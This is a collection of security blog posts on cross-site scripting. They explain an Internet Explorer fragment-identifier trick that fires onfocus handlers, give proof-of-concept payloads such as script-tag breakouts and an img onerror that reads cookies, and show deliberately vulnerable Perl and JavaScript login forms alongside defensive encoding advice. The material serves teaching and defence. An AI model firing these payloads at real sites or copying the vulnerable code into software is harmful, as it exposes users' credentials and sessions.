XSS – Page 2 – Tales from the Crypto


Using URL anchors to enliven XSS exploits

I hope this is original, I certainly couldn’t find anything in a quick bit of research on “Internet Explorer”, “anchor” / “fragment id” and “onfocus” or “focus”. [Click here for the TLDR version.]

Those of you who know me, or have been reading this blog for a while know that I have something of a soft spot for the XSS exploits (See here, here, here and here – oh, and here). One of the reasons I like them is that I can test sites without causing any actual damage to them – a reflected XSS that I launch on myself only really affects me. [Stored XSS, now that’s a different matter] And yet, the issues that XSS brings up are significant and severe.

A quick reminder

XSS issues are significant and severe because:

  • An attacker with a successful XSS is rewriting your web site on its way to the user
  • XSS attacks can be used to deliver the latest Java / ActiveX / Flash / Acrobat exploits
  • Stored XSS can affect all of your customers, and can turn your web server into a worm to infect all of your users all of the time
  • A reflected XSS can be used to redirect your users to a competitor’s or attacker’s web site
  • A reflected or stored XSS attack can be used to void any CSRF protection you have in place
  • XSS vulnerability is usually a sign that you haven’t done the “fit and finish” checks in your security reviews
  • XSS vulnerability is an embarrassing rookie mistake, made often by seasoned developers

Make it “SEXY”

So, I enjoy reporting XSS issues to web sites and seeing how they fix them.

It’s been said I can’t pass a Search box on a web site without pasting in some kind of script and seeing whether I can exploit it.

So, the other day I decided for fun to go and search for “security blog” and pick some entries at random. The first result that came up – blog.schneier.com – seemed unlikely to yield any fruit, because, well, Bruce Schneier. I tried it anyway, and the search box goes to an external search engine, which looked pretty solid. No luck there.

A couple of others – and I shan’t say how far down the list, for obvious reasons – turned up trumps. Moderately simple injections into attributes in HTML tags on the search results page.

One only allowed me to inject script into an existing “onfocus” event handler, and the other one allowed me to create the usual array of “onmouseover”, “onclick”, “onerror”, etc handlers – and yes, “onfocus” as well.

I reported them to the right addresses, and got the same reply back each time – this is a “low severity” issue, because the user has to take some action, like wiggling the mouse over the box, clicking in it, etc.

Could I raise the severity, they asked, by making it something that required no user interaction at all, save for loading the link?

Could I make the attack more “sexy”?

Try something stupid

Whenever I’m faced with an intellectual challenge like that, I find that often a good approach is to simply try something stupid. Something so stupid that it can’t possibly work, but in failing it will at least give me insight into what might work.

I want to set the user’s focus to a field, so I want to do something a bit like “go to the field”. And the closest automatic thing that there is to “going to a field” in a URL is the anchor portion, or “fragment id” of the URL.

Anchor? What’s that in a URL?

You’ll have seen them, even if you haven’t really remarked on them very much. A URL consists of a number of parts:

scheme://host:port/path?query#anchor

The anchor is often called the “hash”, because it comes after the “hash” or “sharp” or “pound” (if you’re not British) character. [The query often consists of sets of paired keys and values, like “key1=value1&key2=value2”, etc.]

The purpose of an anchor is to scroll the window to bring a specific portion to the top. So, you can give someone a link not just to a particular page, but to a portion of that page. It’s a really great idea. Usually an anchor in the URL takes you to a named anchor tag in the page – something that reads “<a name=foobar></a>” will, for instance, be scrolled to the top whenever you visit it with a URL that ends with “#foobar”.

[The W3C documentation only states that the anchor or fragment ID is used to “visit” the named tag. The word “visit” is never actually defined. Common behaviour is to load the page if it’s not already loaded, and to scroll the page to bring the visited element to the top.]

This anchor identifier in the URL is also known as a “fragment identifier” – strictly speaking, the “anchor” is the entire URL, though that’s not how the term is commonly used.

XSS fans like myself are already friendly with the anchor identifier, because it has the remarkable property of never being sent to the server by the browser! This means that if your attack depends on something in the anchor identifier, you don’t stand much chance of being detected by the server administrators.
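You can see this split for yourself with the standard URL parser – the browser keeps the hash entirely client-side and builds the HTTP request line only from the path and query (the example URL here is made up):

```javascript
// The fragment ("hash") is parsed by the browser and never leaves it;
// only the path and query are sent to the server (and into its logs).
const url = new URL("https://example.com/results?q=test#searchbox");

console.log(url.pathname + url.search); // sent to the server: "/results?q=test"
console.log(url.hash);                  // kept by the browser: "#searchbox"
```

So an attack payload carried in the fragment is invisible to server-side logging, exactly as described above.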


The stupid thing

So, the stupid thing that I thought about is “does this work for any name? and is it the same as focus?”

Sure enough, in the W3C documentation for HTML, here it is:

Destination anchors in HTML documents may be specified either by the A element (naming it with the name attribute), or by any other element (naming with the id attribute).

[From http://www.w3.org/TR/html4/struct/links.html#h-12.1]

So, that means any tag with an “id” attribute can be scrolled into view. This effectively applies to any element with a “name” attribute too, because:

This attribute [name] names the current anchor so that it may be the destination of another link. The value of this attribute must be a unique anchor name. The scope of this name is the current document. Note that this attribute shares the same name space as the id attribute. [my emphasis]

[From http://www.w3.org/TR/html4/struct/links.html#adef-name-A]

This is encouraging, because all those text boxes already have to have ids or names to work.

So, we can bring a text box to the top of the browser window by specifying its id or name attribute as a fragment.

That’s the first stupid thing checked off and working.

Bringing it into focus

But moving a named item to the top of the screen isn’t the same as selecting it, clicking on it, or otherwise giving it focus.

Or is it?

Testing in Firefox, Chrome and Safari suggested not.

Testing in Internet Explorer, on the other hand, demonstrated that versions as old as IE8, and all the way through IE9 and IE10, caused focus behaviour – including any “onfocus” handler – to trigger.

The TLDR version:

Internet Explorer has a behaviour different from other browsers which makes it easier to exploit a certain category of XSS vulnerabilities in web sites.

If you are attacking users of a vulnerable site that allows an attacker to inject code into an “onfocus” handler (new or existing), you can force visitors to trigger that “onfocus” event, simply by adding the id or name of the vulnerable HTML tag to the end of the URL as a fragment ID.

You can try it if you like – using the URL http://www.microsoft.com/en-us/default.aspx#ctl00_ctl16_ctl00_ctl00_q

OK, so you clicked it and it didn’t drop down the menu that normally comes when you click in the search field on Microsoft’s front page. That’s because the onfocus handler wasn’t loaded when the browser set the focus. Try reloading it.

You can obviously build any number of test pages to look at this behaviour:


<input type="text" name="exploit" id="exploitid" onfocus="alert(1)" />


Loading that page in Internet Explorer with a link to formpage.html#exploit or formpage.html#exploitid will pop up an ‘alert’ dialog box.

So, that’s a security flaw in IE, right?

No, I don’t think it is – I don’t know that it’s necessarily even a flaw.

The documentation I linked to above only talks about the destination anchor being used to “visit” a resource. It doesn’t even say that the named anchor should be brought into view in any way. [Experiment: what happens if the ID in the fragment identifier is a “type=hidden” input field?]

It doesn’t say you should set focus; it also doesn’t say you should not set focus. Setting focus may be simply the most convenient way that Internet Explorer has to bring the named element into view.

And the fact that it makes XSS exploits a little easier doesn’t make it a security flaw either – the site you’re visiting STILL has to have an XSS flaw on it somewhere.

Is it right to publish this?

Finally, the moral question has to be asked and answered.

I start by noting that if I can discover this, it’s likely a few dozen other people have discovered it too – and so far, they’re keeping it to themselves. That seems like the less-right behaviour – because now those people are going to be using this on sites unaware of it. Even if the XSS injection is detected by the web site through looking in their logs, those same logs will tell them that the injection requires a user action – setting focus to a field – and that there’s nothing causing that to happen, so it’s a relatively minor issue.

Except it’s not as minor as that, because the portion of the URL that they CAN’T see is going to trigger the event handler that just got injected.

So I think the benefit far outweighs the risk – now defenders can know that an onfocus handler will be triggered by a fragment ID in a URL, and that the fragment ID will not appear in their log files, because it’s not sent to the server.

I’ve already contacted Microsoft’s Security team and had the response that they don’t think it’s a security problem. They’ve said they’ll put me in touch with the Internet Explorer team for their comments – and while I haven’t heard anything yet, I’ll update this blog when / if they do.

In general, I believe that the right thing to do with security issues is to engage in coordinated disclosure, because the developer or vendor is generally best suited to addressing specific flaws. In this case, the flaw is general, in that it’s every site that is already vulnerable to XSS or HTML injection that allows the creation or modification of an “onfocus” event handler. So I can’t coordinate.

The best I can do is communicate, and this is the best I know how.

On new exploit techniques

Last year’s discussion on “Scriptless XSS” made me realise that there are two kinds of presentation about new exploits – those that talk about a new way to trigger the exploit, and those that talk about a new way to take advantage of the exploit.

Since I didn’t actually see the “Scriptless XSS” presentation at Blue Hat (not having been invited, I think it would be bad manners to just turn up), I won’t address it directly, and it’s entirely possible that much of what I say is actually irrelevant to that particular paper. I’m really being dreadfully naughty here and setting up a strawman to knock down. In the tech industry, this practice is often referred to as “journalism”.

So where’s my distinction?

Let’s say you’re new to XSS. It’s possible many of you actually are new to XSS, and if you are, please read my previous articles about how it’s just another name for allowing an attacker to inject content (usually HTML) into a web page.

Your first XSS exploit example may be that you can put “<script>alert(1)</script>” into a search field, and it gets included without encoding into the body of the results page. This is quite frankly so easy I’ve taught my son to do it, and we’ve had fun finding sites that are vulnerable to this. Of course, we then inform them of the flaw, so that they get it fixed. XSS isn’t perhaps the most damaging of exploits – unlike SQL injection, you’re unlikely to use it to steal a company’s entire customer database – but it is an embarrassing indication that the basics of security hygiene are not being properly followed by at least some of your development team.

The trigger of the exploit here is the “<script>” tag markup itself, and the exploit is the injected script containing an alert(1) command.

Let’s say now that the first thing a programmer tries in order to protect his page is to replace the direct embedding of text with an <input> tag, whose value is set to the user-supplied text, in quotes.

Your original exploit is foiled, because it comes out as:

<input readonly=1 value="<script>alert(1)</script>">

That’s OK, though, because the attacker will see that, and note that all he has to do is provide the terminating quote and angle bracket at the start of his input, to produce instead:

<input readonly=1 value=""><script>alert(1)</script>">

This is a newer method of exploiting XSS-vulnerable code. Although a simple example, this is the sort of thing it’s worth getting excited about.
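The fix that survives this newer exploit is to encode the user-supplied text before it goes into the attribute, so the attacker’s closing quote becomes inert text. A minimal sketch – encodeAttribute is my hypothetical helper, not a standard function:

```javascript
// Hypothetical helper: make user text inert inside a double-quoted HTML attribute.
// Ampersand must be encoded first, so the other entities aren't double-encoded.
function encodeAttribute(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

const attack = '"><script>alert(1)</script>';
const tag = '<input readonly=1 value="' + encodeAttribute(attack) + '">';
// The attacker's terminating quote is now the text &quot; – it never closes the attribute.
console.log(tag);
```

With this in place, the `">` prefix no longer escapes the attribute, and the injected markup is displayed rather than executed.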

Why is that exciting?

It’s exciting because it causes a change in how you planned to fix the exploit. You had a fix that prevented the exploit from happening, and now it fails, so you have to rethink this. Any time you are forced to rethink your assumptions because of new external data, why, that’s SCIENCE!

And the other thing is…?

Well, the other thing is noting that if the developer did the stupid thing, and blocked the word “alert”, the attacker can get around that defence by using the “prompt” keyword instead, or by redirecting the web page to somewhere the attacker controls. This may be a new result, but it’s not a new trigger, it’s not a new cause.

When defending your code against attack, always ask yourself which is the trigger of an attack, rather than the body of the attack itself. Your task is to prevent the trigger, at which point the body becomes irrelevant.

Time to defend myself.

I’m sure that someone will comment on this article and say that I’m misrepresenting the field of attack blocking – after all, the XSS filters built into major browsers surely fall into the category of blocking the body, rather than the trigger, of an attack, right?

Sure, and that’s one reason why they’re not 100% effective. They’re a stopgap measure – a valuable stopgap measure, don’t get me wrong, but they are more in the sense of trying to recognise bad guys by the clothing they choose to wear, rather than recognising bad guys by the weapons they carry, or their actions in breaking locks and planting explosives. Anyone who’s found themselves, as I have, in the line of people “randomly selected for searching” at the airport, and looked around and noted certain physical similarities between everyone in the line, will be familiar with the idea that this is more an exercise in increasing irritation than in applying strong security.

It’s also informative to see methods by which attacks are carried out – as they grow in sophistication from fetching immediate cookie data to infecting browser sessions and page load semantics, it becomes easier and easier to tell developers “look at all these ways you will be exploited, and you will begin to see that we can’t depend on blocking the attack unless we understand and block the triggers”.

Keep doing what you’re doing

I’m not really looking to change any behaviours, nor am I foolish enough to think that people will start researching different things as a result of my ranting here.

But, just as I’ve chosen to pay attention to conferences and presentations that tell me how to avoid, prevent and fix, over those that only tell me how to break, I’ll also choose to pay attention to papers that show me an expansion of the science of attacks, their detection and prevention, over those that engage in a more operational view of “so you have an inlet, what do you do with it?”

XSS Hipster loved Scriptless XSS before it was cool

I was surprised last night and throughout today, to see that a topic of major excitement at the Microsoft BlueHat Security Conference was that of “Scriptless XSS”.

The paper presented on the topic certainly repeats the word “novel” a few times, but I will note that if you do a Google or Bing search for “Scriptless XSS”, the first result in each case is, of course, a simple blog post from yours truly, a little over two years ago, in July 2010.

As the article notes, this isn’t even the first time I’d used the idea that XSS (Cross Site Scripting) is a complete misnomer, and that “HTML injection” is a more appropriate description. JavaScript – the “Scripting” in most people’s explanations of Cross Site Scripting – is definitely not required, and is only used because it is an alarmingly clear demonstration that something inappropriate is happening.

Every interview in the security field – every one!

Every time I have had an interview in the security field – that’s since 2006 – I’ve been asked “Explain what Cross Site Scripting is”, and rather hesitantly at first, but with growing surety, I have answered that it is simply “HTML injection”, and the conversation goes wonderfully from there.

Why did I come up with this idea?

Fairly simply, I’ve found that if you throw standard XSS exploits at developers and tell them to fix the flaw, they do silly things like blocking the word “script”. As I’ve pointed out before, Cross Site Scripting (as with all injection attacks) requires an Injection (how the attacker provides their data), an Escape (how the attacker’s data moves from data into code), an Attack or Execution (the payload), and optionally a Cleanup (returning the user’s browser state to normal so they don’t notice the attack happening).

It’s not the script, stupid, it’s the escape.

Attacks are wide and varied – the paper on Scriptless Attacks makes that clear, by presenting a number of novel (to me, at least) attacks using CSS (Cascading Style Sheet) syntax to exfiltrate data by measuring scrollbars. My example attack used nothing so outlandish – just the closure of one form, and the opening of another, with enough CSS attribute monkeying to make it look like the same form. The exfiltration of data in this case is by means of the rather pedestrian method of having the user type their password into a form field and submit it to a malicious site. No messing around with CSS to measure scrollbars and determine the size of fonts.

Hats off to these guys, though.

I will say this – the attacks they present are an interesting and entertaining demonstration that if you’re trying to block the Attack or Cleanup phases of an Injection Attack, you have already failed, you just don’t know it yet. Clearly a lot of work and new study went into these attacks, but it’s rather odd that their demonstrations are about the more complicated end of Scriptless XSS, rather than about the idea that defenders still aren’t aware of how best to defend.

Also, no doubt, they had the sense to submit a paper on this – all I did was blog about it, and provide a pedestrian example with no flashiness to it at all.

Hipster gets no respect.

So, yeah, I was talking about XSS without the S, long before it was cool to do so. As my son informs me, that makes me the XSS Hipster. It’d be gratifying to my ego to get a little nod for that (heck, I don’t even get an invite to BlueHat), but quite frankly rather than feeling all pissed off about that, I’m actually rather pleased that people are working to get the message out that JavaScript isn’t the problem, at least when it comes to XSS.

The problem is the Injection and the Escape – you can block the Injection by either not accepting data, or by having a tight whitelist of good values; and you can block the Escape by appropriately encoding all characters not definitively known to be safe.
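As a sketch of what “encoding all characters not definitively known to be safe” can look like – here only letters, digits and spaces pass through untouched, and everything else becomes a numeric character reference (the function name is illustrative, not a standard API):

```javascript
// Whitelist encoder: anything outside [A-Za-z0-9 ] is emitted as &#NNN;
// so the browser can never read it as markup – no Escape is possible.
function encodeForHtml(text) {
  return String(text).replace(/[^A-Za-z0-9 ]/g,
    ch => "&#" + ch.codePointAt(0) + ";");
}

console.log(encodeForHtml("<script>alert(1)</script>"));
// → &#60;script&#62;alert&#40;1&#41;&#60;&#47;script&#62;
```

A whitelist like this is deliberately over-cautious – it may encode more than strictly necessary, but it cannot be caught out by a character it didn’t think of, which is the failure mode of every blacklist.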

NCSAM/2011–Post 17–SSL does not make your web site secure

I know, it sounds like complete heresy, but there it is – SSL and HTTPS will not make your web site secure.

Even more appropriate (although I queued the title of this topic up almost a month ago) is this recent piece of news: Top FBI Cyber Cop Recommends New Secure Internet, which appears to make much the opposite point, that all our problems could be fixed if we were only to switch to an Internet in which everyone is identified (something tells me the FBI is not necessarily looking for us to use strong encryption).

HTTPS is just one facet of your web site security

There are a number of ways in which an HTTPS-only website, or HTTPS-only portion of a site, can be insecure. Here’s a list of just some of them:

Application vulnerabilities

It’s been a long time since web servers provided only static content in their pages. Now pretty much every web site has to serve “applications”, in which inputs provided by the visitor are processed and incorporated into the site’s outputs.

There are any number of ways in which those inputs can produce bad outputs – Cross Site Scripting (XSS), on which I’ve posted before; Cross Site Request Forgery, allowing an attacker to force you to take actions you didn’t intend; SQL injection, where data behind a web site can be extracted and/or modified – these are just the most commonly known.

Applications can also fail to check credentials, fail to apply access controls, and even fail in some old-fashioned ways like buffer overflows leading to remote code execution.

Path vulnerabilities

Providing sensitive information in an application’s path, or through parameters passed in a URL, is another common means by which application authors, who think they are protected by using HTTPS, come a significant cropper. URLs – even HTTPS protected URLs – are often read, logged, and processed at both ends of the connection, and sometimes even in the middle!

Egress filtering in enterprises is often carried out by interrupting the HTTPS communication between client and server, using a locally-deployed trusted root certificate. This quite legitimately allows the egress filtering system to process URLs to determine what’s a safe request, and what’s a dangerous one. It can also cause information sent in a URL to be exposed. This is one reason why an application developer should avoid using GET requests for any exchange of user data, or of data that the site considers sensitive.

Other path vulnerabilities – mostly fixed these days, but still something that attackers and scanning suites alike feel is worth trying – are those where the path can be changed by embedding extra slash or double-dot characters or sequences. Enough “..” entries in a path, and if the server isn’t properly written or managed, an attacker can escape out of the web server’s restrictions, and visit the operating system disk. The official term for this is a “path traversal attack”.

Credential vulnerabilities

The presence of a padlock – or whatever your web browser shows to indicate an HTTPS, rather than HTTP, connection – indicates a few things:

  • Your communication is encrypted (This can be overcome, but it takes so much work at both client and server for most implementations that I think it’s fair to say you will not be in the situation where you see a padlock without the use of encryption.)
    • That doesn’t mean to say you will always have the best encryption around, but if you didn’t go and enable weaker encryption than that supplied in a recent and patched browser, you’re fairly well guaranteed to be safe.
  • The web site you are connecting to is at least trying to give some indication of security.
  • The web site to which you connected has convinced your browser – or you – that it is who it claims to be in the address bar.
    • Note that this may not mean that it passes a test of its identity that you really want. You could be in an enterprise with an SSL-interrupting egress filter, as explained above, you could have been convinced fraudulently to accept the site’s certificate, or you could have installed an inappropriate certificate authority’s root certificate.

If you’re the sort of person who clicks through browser warnings, all you’ve managed to confirm is that your communication is encrypted, and the site you’ve connected to is trying to convince you it is secure. Note that this is exactly what a fraudulent site will try to do. The padlock isn’t everything.

Then think about where your secret information goes. If you’re like a lot of users, you’ll be using the same password on every site you connect to, or some variation thereof. Just because the site uses SSL does not mean that your password is protected once it arrives – or at every other site where you’ve reused it.

But at least it’s a start.

If your bank doesn’t use HTTPS when accepting your logon information, it’s a sign that they really aren’t terribly interested in protecting that transaction. Maybe you should ask them why.

Many web sites will use HTTPS on parts of the site, and HTTP on others. Observe what they choose to protect, and what they choose to leave public. Is the publicly-transmitted information truly public? Is it something you want other people in the coffee shop or library to know you’re browsing?

Simplifying Cross Site Scripting / HTML Injection

Some simple statements about Cross Site Scripting / XSS / HTML Injection (all terms for the same thing):

  • Ignore the term “Cross Site Scripting” as a confusing anachronism. Think “HTML Injection” whenever you hear “Cross Site Scripting”, and you won’t go wrong.
  • The problem of XSS can be summed up quite simply as:
    • XSS allows an outsider to re-write your vulnerable web page(s) before your end users see them.
      • That means any part of the web page can be re-written to do anything your web page could do to the end user
      • That means any attack on your users will be trusted as much as your users trust you
      • That means your users’ credentials, session cookies and other secret information is controlled by an attacker
    • XSS attacks are hard – and in some cases impossible – for you, the server owner, to detect.
    • XSS is easy to prevent, but requires your developers to be aware of, and work to prevent, the problem.
    • The presence of XSS vulnerabilities may void your compliance with regulatory standards such as PCI, SOX, etc.
      • Allowing outsiders to rewrite your web page may mean that you cannot state that you adequately control access to the collection of financially significant data.
      • PCI requires you develop applications with regard to a recognised standard framework, and specifically points to OWASP. OWASP lists XSS and Injection flaws as two of the “top ten” vulnerabilities to prevent. This is as close as PCI gets to outright stating that XSS prevents compliance from being achievable.
  • All XSS attacks have four components:
    • The Injection
      • Where the attacker provides bad data, either directly to the user, or through a ‘store and replay’ mechanism.
    • The Escape (from “text” / “data” to “code”)
      • The escape is optional – but that option is under the control of the page’s author
      • If the page author requires an escape, the attacker cannot attack without correctly escaping
    • The Attack
      • The attack is mandatory – an XSS attack requires an attack component. Duh.
      • However – where an escape is required by the web page, the attack must follow the escape.
      • There are numerous possible attacks – and more being developed daily. You cannot list all possible attack patterns.
    • The Cleanup
      • The cleanup is optional, at the choice of the attacker, and hides from the user the fact that they have been exploited
      • Many attacks use your users’ credentials quickly enough that the cleanup is not required. By the time the user notices (often only a second or so), the attacker has stolen the account, made purchases or read off credit card information.
  • Given this component approach, you as a web page author have limited options:
    • You can’t block the cleanup, because it’s too late at that point – the attack has occurred, and besides, the attacker may not be interested in the cleanup. The cleanup is really only useful in demonstrating that subtle attacks can take place, giving attackers months to clean out a credit card.
    • Blocking the attack is a leaky measure – not that it isn’t worth doing in some cases. For instance, browser protections against XSS often block the attack component, because they don’t control the web site and can’t reasonably block anything else.
    • Blocking the escape is a guaranteed measure. If attacker-supplied code cannot be viewed by the browser as code, there is no possibility of attack.
    • Blocking the injection is also a guaranteed measure, with two caveats – when you block an injection, you have to make sure that the injection hasn’t already occurred, and that it cannot occur from any other sources.
      • This means that if you block injection of code into, say, a database of message forum posts, you have to scan the existing posts to ensure that the injection hasn’t already taken place.
        • Clean your database when you recognise an injection or attack pattern.
      • Any time there is a database that accumulates information for later display, there will be more than one source vying to put data into the database. If injection is possible in one source, injection is likely from other sources, too.
        • Funnel all sources through one injection filter.
      • Preventing an escape from text into code works whether or not all the injections are blocked.
        • Never rely on injection prevention alone.
  • No matter how innovative attackers get, Cross Site Scripting attacks need not occur.
    • Learn how browsers differentiate between text and code.
    • Use that knowledge to ensure that text remains text, and is never seen as code.
    • Let the browser and your web server platform and libraries help you
      • Use an appropriate document object model function to set text values on fields.
      • Instead of composing HTML in a string to include user supplied text, use a <span> or a <div>, and set its innerText property.
    • Don’t sacrifice safety for speed.
      • Don’t build HTML “on the fly”, either while generating the page or displaying it.
        • innerHTML is a bad thing to set.
    • Don’t try to “test out” XSS vulnerabilities.
      • You (or your testers) are not Ash Ketchum, and therefore cannot “catch ‘em all”.
    • Develop XSS vulnerabilities out of your application
      • Anything you didn’t specifically write as code, is attacker-supplied untrustworthy data.
      • Prevent injections as much as possible by validating that input is correctly formed.
        • Note that you can’t completely validate all input in all cases.
        • The obvious “bad example” is that of a bug reporting system into which security vulnerability reports are placed. If I have to report an issue with an XSS flaw, I’m going to be deliberately and respectfully pasting XSS attack code into your application. So in that case, you cannot possibly validate my information and remove “invalid” code without removing the valuable part of the text!
        • Validation at the Client is for Convenience only – it allows you to quickly say “that’s not right” and have the user correct it.
        • Only validation at the Server is for Security. Anything you ask the client browser to do on your behalf may be ignored.
      • If you have limited resources, focus on preventing the ability to escape from text into code.
        • Do this by encoding output so that each level of processing can accurately and uniformly distinguish between code and data.
          • This means you must know what each level of processing uses as encoding or escaping of character sequences.
          • This also means you must know how many layers of processing there are between you and the user.
  • If you do ONE THING to prevent XSS on your site, output encoding is the one thing to do.
    • Defence in depth says “never do just one thing”. One thing will one day fail to be implemented properly.
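As an illustration of “each level of processing” needing its own encoding: here user input travels through two layers – a URL query string sitting inside an HTML attribute – and is encoded once per layer, innermost first (encodeHtml is my hypothetical helper; encodeURIComponent is the standard JavaScript URL encoder):

```javascript
// Layer-aware output encoding: URL-encode for the query string (inner layer),
// then HTML-encode the whole URL for the attribute (outer layer).
function encodeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

const userInput = 'fish & "chips"';
const href = "/search?q=" + encodeURIComponent(userInput);      // inner: URL encoding
const anchor = '<a href="' + encodeHtml(href) + '">results</a>'; // outer: HTML encoding

console.log(anchor);
// → <a href="/search?q=fish%20%26%20%22chips%22">results</a>
```

Reversing the order of the two encoders, or skipping one of them, is exactly the kind of layer confusion that lets attacker data escape from text into code.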

Cross-Site Scripting (XSS) – no script required

I’m going to give away a secret that I’ve successfully used at every interview I’ve had for a security position.

“Cross-Site Scripting” (XSS) is a remarkably poor term for the attack, and for the vulnerability that makes it possible. The correct term should be “HTML Injection”, because it succinctly explains the source of the problem, and provides developers with pretty much all the information they need to recognise, avoid, prevent, and address the vulnerabilities that lead to these attacks being possible. Here are a few reasons why “Cross-Site Scripting” is such a poor name:

  1. It doesn’t abbreviate well – the accepted abbreviation is XSS, because CSS was taken by “Cascading Style Sheets”
  2. Nobody seems to be able to explain, definitively and without the possibility of being contradicted by someone else’s explanation, whether “Cross Site” means “intra site”, “inter site”, both or neither. Certainly there are examples of attacks which use one XSS-vulnerable page only to exploit a user.
  3. As you will see from the remainder of this post, no actual script is required at all, either on the browser, or on the server. So, disabling script in the browser, or running a tool such as noscript that essentially does the same thing for you, is not a complete solution.
  4. HTML Injection can include injecting ActiveX, Flash, Java, or JavaScript objects into an HTML page.

[Note that I am not suggesting that prior work into XSS protections is bad, just that it is not complete if it focuses on JavaScript / ECMAScript / whatever you want to call it.]

Failure to understand XSS has led to people assuming that they can protect themselves by simple measures – disabling JavaScript, filtering “<script>” tags, “javascript:” URLs, and so on. Such approaches have uniformly failed to work, in much the same way as other “black-list” methods of defeating attacks on security flaws – it pretty much dares the attacker to find a way to exploit the bug using something else.
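To make the point concrete, here’s a hypothetical blacklist filter of the sort I keep running into, together with a payload that walks straight past it. The function and payload are my own invention for illustration, not taken from any particular product:

```javascript
// A naive blacklist: strip <script> tags and "javascript:" URLs.
// This is EXAMPLE BAD CODE - it blocks one repro, not the vulnerability.
function naiveFilter(input) {
    return input
        .replace(/<script[^>]*>[\s\S]*?<\/script>/gi, "")
        .replace(/javascript:/gi, "");
}

// No <script> tag, no "javascript:" URL - yet in a victim's browser this
// executes on page load, via an event handler on a broken image.
var payload = '<img src=x onerror=alert(document.cookie)>';
console.log(naiveFilter(payload));  // the payload passes through untouched
```

The filter happily removes the attacker’s first attempt and passes the second – which is the whole problem with enumerating badness.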

Particularly galling is when I look at code whose developers had heard about XSS, had looked about for solutions, and had found a half-baked solution that made them feel better about their code, made the bug report go from “reproducible” to “cannot reproduce”, but left them open to an attacker with a little more ingenuity (or simply a more exhaustive source of sample attacks) than they had. It seems that developers often try, but are limited by the resources they find on the Intarweb – particularly blogs seem to provide poor solutions (ironic, I know, that I am complaining about this in my blog).

I know all this – give me something new.

Alright then, here’s something that appears to be new to many – a demonstration of Cross-Site Scripting without scripting.

We all know how XSS happens, right? A programmer wants to let the user put some information on the page. Let’s say he wants to warn the user that his password was entered incorrectly, or his logon session has expired. So, he needs to ask the user to enter username and password again, but probably wants to save time by putting the user’s name in place for the user, to save on typing.

Here’s what the form looks like – you’ve all seen it before:


The code for this form is simple, mostly to make the example easy. I’ll write it in Perl and Javascript – because the Perl version is exploitable everywhere, and because the Javascript version demonstrates how DOM-based XSS attacks work (and how browser strangeness can cause them to be flakey).

[Note: A DOM-based attack, for those that don’t know, is an attack that uses Javascript to modify the HTML page while it is at the browser’s side. These are difficult to detect, but generally result from the use of unsafe functionality such as assignment to innerHTML.]

Needless to say – don’t use these as examples of good code – these are EXAMPLES of VULNERABLE CODE. And lousy code at that.


use CGI;
$query = new CGI;
print $query->header,
    $query->h1("Session timed out."),
    $query->p("You have been logged out from the site - please enter your username and password to log back in."),
    $query->start_form(-action=>"happyPage.htm", -method=>"get"),
    # The vulnerability: the username parameter is pasted, unencoded,
    # straight into the value attribute.
    "Username: <input name=\"username\" value=\"" . $query->param("username") . "\" />", $query->br(),
    "Password: ", $query->password_field(-name=>"password"), $query->br(),
    $query->submit(),
    $query->end_form;


<h1>Session timed out.</h1>
<p>You have been logged out from the site - please enter your username and password to log back in.</p>
<form id="safeForm" action="happyPage.htm" method="get">
  Username: <input name="username" value="name placeholder" /><br />
  Password: <input name="password" type="password" /><br />
  <input type="submit" />
</form>

<script type="text/javascript">
    var queries;
    function getQueryString(key) {
        if (queries == undefined) {
            queries = {};
            var s = window.location.href.replace(/[^?]+\?/, "").split("&");
            for (var x in s) {
                var v = s[x].split("=");
                if (v.length == 2)
                    queries[v[0]] = decodeURIComponent(v[1].replace(/\+/g, " "));
            }
        }
        if (key in queries)
            return queries[key];
        return "";
    }

    var myField = document.getElementById("safeForm");

    if (myField != null) {
        var un = getQueryString("username");

        // Build the form with the username passed in.
        // The vulnerability: un is parsed as HTML by innerHTML.
        myField.innerHTML = myField.innerHTML.replace(/name placeholder/, un);
    }
</script>

Side Note – on DOM-based XSS and anchors

Now, why did I specifically include the “getQueryString” in my Javascript version above? I could have simply said “assume this function exists with ordinary behaviour”. Well, I chose that one (downloaded from, naturally, a blog advising how to do this properly) because it processes the entire href, anchor and all.

If we modify our URL by adding “#&” between the query and the variable “username”, it demonstrates one of the more frightening aspects of DOM-based attacks. Those of you who are aware of what an anchor does to a browser will already have figured it out, but here’s a quick explanation.

The “anchor” is considered to be everything after the “#” in a URL. Although it looks like it’s part of the query string, it’s not. Browsers don’t send the “#” or anything after it to the server when requesting a web page, so it’s not seen in a network trace, and it’s not seen in the server logs. This means that DOM-based attacks can hide all manner of nastiness in the anchor, and your scanners won’t pick it up at all.
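To see why this matters, here’s a standalone version of that query-string parser – the same logic as the page’s getQueryString, refactored (my change, for illustration) to take the href as a parameter so it can be run outside a browser. Feed it a URL where the attack sits after the “#”, and it happily returns the payload even though the server would never see anything past the fragment:

```javascript
// Same parsing as the page's getQueryString, but taking the href as an
// argument. Note it splits everything after the "?" - including the
// fragment, which the browser never sends to the server.
function getQueryStringFrom(href, key) {
    var queries = {};
    var s = href.replace(/[^?]+\?/, "").split("&");
    for (var x in s) {
        var v = s[x].split("=");
        if (v.length == 2)
            queries[v[0]] = decodeURIComponent(v[1].replace(/\+/g, " "));
    }
    return (key in queries) ? queries[key] : "";
}

// The server sees only "?dummy=1"; the payload hides in the fragment.
var href = 'http://localhost/XSSFile.htm?dummy=1#&username=<b>hidden</b>';
console.log(getQueryStringFrom(href, "username"));
```

The request line in the server log reads `GET /XSSFile.htm?dummy=1` – the attack simply isn’t there to be found.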

Back to the scriptless XSS…

So, this page would normally get executed with a parameter, “username” which would be the username whose account we’re asking for credentials for – and certainly it works with http://localhost/XSSFile.htm?username=Fred@example.com :


The trouble is, it also works with the XSS attackers’ favourite test example, http://localhost/XSSFile.htm?username="><script>alert("XSS")%3b</script> :


Now, I’ve seen developers who are given this demonstration that their page is subject to an XSS attack. What do they do? They block the attack. Note that this is not the same as removing or fixing the vulnerability. What these guys will do is block angle brackets, or the tag “<script>”. As a security guy, this makes me sigh with frustration, because we try to drill it into people’s heads, over and over and over again, that blacklisting just doesn’t work, and that “making the repro go away” is not equivalent to “fixing the problem demonstrated by the repro”.

